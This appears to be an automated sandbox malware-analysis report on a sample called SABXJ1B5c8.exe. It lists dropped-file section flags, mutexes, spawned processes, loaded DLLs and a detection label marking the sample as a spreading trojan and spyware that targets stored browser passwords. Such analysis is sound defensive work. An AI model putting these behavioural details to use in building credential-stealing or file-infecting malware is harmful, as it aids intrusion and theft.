Source: GoogleCrashHandler64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: wbengine.exe.2.dr	Binary string: base\stor\blb\catalog\compare.cpprowid1 != rowid2pKey->m_type == pCol->m_typepRow1 > pRow2_hImpersonationToken != INVALID_HANDLE_VALUEbase\stor\blb\blbimg\blbimg.cxxReadHandle != INVALID_HANDLE_VALUEWriteHandle != INVALID_HANDLE_VALUEpdwFlagsFveGetStatusWwszDeviceName%ws\%wsuCurrentBit < HintSpaceBitmapSizeExtentLength > 0pCurrentListEntry->Length > 0pbRecomputeNeededpBadClusExtentsBeforeRecovery\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{\System Volume Information\*{3808876B-C176-4e48-B7AE-04046E6CC752}\System Volume Information\{{3808876B-C176-4e48-B7AE-04046E6CC752}ReplicationContext->FirstBlock != NULLIoState[CurrentBuffer] == BLBIMGI_IO_STATE_WRITINGBackupFileName != NULLReplicationHandleReplicationContext != NULLoffset[i] < volumeSizet.QuadPart < restoreContext->VolumeSizereadBuffer != NULL\pagefile.sys\hiberfil.sys!IsListEmpty(&diffsInSource)
Source: wbengine.exe.2.dr	Binary string: base\stor\blb\engine\blbengutils\Blbvhdhelper.hthis->m_handle == NULL\\?\Globalroot\Device\Harddisk%lu\Partition1\\?\Globalroot\Device\Harddisk%lu\Partition2\\?\Globalroot\Device\HarddiskVolume%luChild_{47b7fa87-ce42-48ff-8b18-2f1088121503}WindowsBackupLinksbase\stor\blb\engine\blbengutils\blbvhdhelper.cppwszVhdFile && wszVhdFilepwszVolumeDevicePathwszDiskPath && wszDiskPathpwszVolumePathwszMountedDeviceName && wszMountedDeviceNamepCBlbVhdwszMountedVolumePathNoSlash && wszMountedVolumePathNoSlashpVhdContextpVhdContextForRemovalwszVolumeDevicePath && wszVolumeDevicePathppVhdContextpVhdContext->m_pCBlbVhdsdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_1 \|\| sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_2ppDependencyInfopbIsVolVirtualppStorageDepInfowszTargetVolName && wszTargetVolNamewszVirtualSrcVolName && wszVirtualSrcVolNamepbIsVirtualSrcVolDependantpVolumeVHDInfo != NULLpstDepInfo != NULLpstDepInfoType2MaxAncestor != NULLpwszDiffVhdFilePath && pwszVhdTempPath%ws_%ws_%wspProgressReportCallbackContextwszVHDVolumeDevicePathpbCompactionRequiredwszVhdFilepGuidSnapshotIdwszVHDVolumeDevicePath && wszVHDVolumeDevicePathpdwVHDDeviceDiskNumberpVhdHandle
Source: wbengine.exe.2.dr	Binary string: _((HANDLE)(LONG_PTR)-1) != hFilebase\stor\blb\dsm\dsmutils\dll\fsutilswrapper.cppExtractVolumePath(ssPath, ssVolumePath)SplitDirPath( ssDirPath, ssParentDir, ssDirName )GetParentPaths(ssPath, arrstrPaths)ssDirPath.Length() != 0base\stor\blb\dsm\dsmutils\dll\fsutils.cpppstrPath != 0pstrName != 0CLOCK$COMLPTCONPRNAUXNUL\\?\GLOBALROOT\Device\base\stor\blb\dsm\dsmutils\dll\fsutils.cppInvalid path:%lsssPath.Length() > 0GetVolumePrefixLength failed for %lsFailed to parse path:%lsExtractVolumePath(ssWorkingPath, ssVolumePath)ssWorkingPath[ssWorkingPath.Length() - 1] == L'\\'(((HRESULT)(hrReason)) < 0)pstrPath && pstrPath[0]pfIsReparsedppstrReparsePtPath && (ppstrReparsePtPath == 0)GetFileAttributes() failed on:%lsIsPathMountPoint(ssPath.PeekStr(), &fMountPoint)pszVolumePath != 0phVolume != 0ssVolumePath[ssVolumePath.Length() - 1] == L'\\'Failed to open volume:%ls((HANDLE)(LONG_PTR)-1) == hVolumeppstrPath && ppstrPath == 0dwPathLength > 0 && pstrFilePath[dwPathLength-1] == L'\\'0 != pdwFileAttributesGetFileInformationByHandle(hFile, &fileInfo)0 != lpstrFilePathCreateFile unsuccessful for %wsFSWrapperGetFileAttributes(hFile, pdwFileAttributes)0 != pFileAttributesGetFileInformationByHandleEx(hFile, FileBasicInfo, &fileInfo, sizeof(FILE_BASIC_INFO))GetFileSize failed for %ws((DWORD)-1) != dwFileAttributesGetFileInformationByHandleEx failedSetFileInformationByHandle failedFSWrapperSetFileAttributes(hFile, dwFileAttributes)SplitDirPath(strPath, strParent, strChild)Path %S is invalid as it contains a '.' or '..', hr=0x%08xHRESULT_FROM_WIN32(GetLastError())wszPath && wszPath[0]pfIsPathMountPoint
Source: wbengine.exe.2.dr	Binary string: base\stor\blb\engine\blbengutils\blbvolumeutils.cpppbFloppypguidVolumeId != NULLpbIsCritical != NULLpguidVolumeIdwszMountedDeviceNamewszVolumeGuidpwszReparsePointName\\?\GLOBALROOT\DEVICE\HARDDISKVOLUME%dWsbMountedVolumeFile%lu_%spVolumeCatrgVolumeLocalwszVolumeGuidPathpwszVolumeGlobalRootPathVolume%ws\\?\GLOBALROOT%wspdwlJournalIdplastUsnwszVolumeName && *wszVolumeNamepbPerformResizepdwlUsnSizevssSnapshotId != GUID_NULLdwlJournalId != BLB_INVALID_USN_JOURNAL_IDusnBeforeSnapShot != BLB_INVALID_USN_IDwszBackupSetDirectorypwszVhdPathwszVolumeName != NULLpbIsVolumeOnSharedDisk != NULLpbIsCSVpdwVolumeNumber6

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@20/162@17/9

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Jump to behavior

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe

File created: C:\Users\user\AppData\Roaming\ec81b4f2d7d67082.bin

Jump to behavior

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-ec81b4f2d7d6708282f24b2d-b
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-ec81b4f2d7d67082-inf
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-ec81b4f2d7d670829ea72c54-b

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe

File created: C:\Users\user\AppData\Local\Temp\aut7759.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000011.00000002.2875384069.000000000362D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002704000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.00000000026E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002718000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.00000000026F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002725000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SABXJ1B5c8.exe	Virustotal: Detection: 68%
Source: SABXJ1B5c8.exe	ReversingLabs: Detection: 84%

Source: unknown	Process created: C:\Users\user\Desktop\SABXJ1B5c8.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown	Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: unknown	Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: unknown	Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown	Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SABXJ1B5c8.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
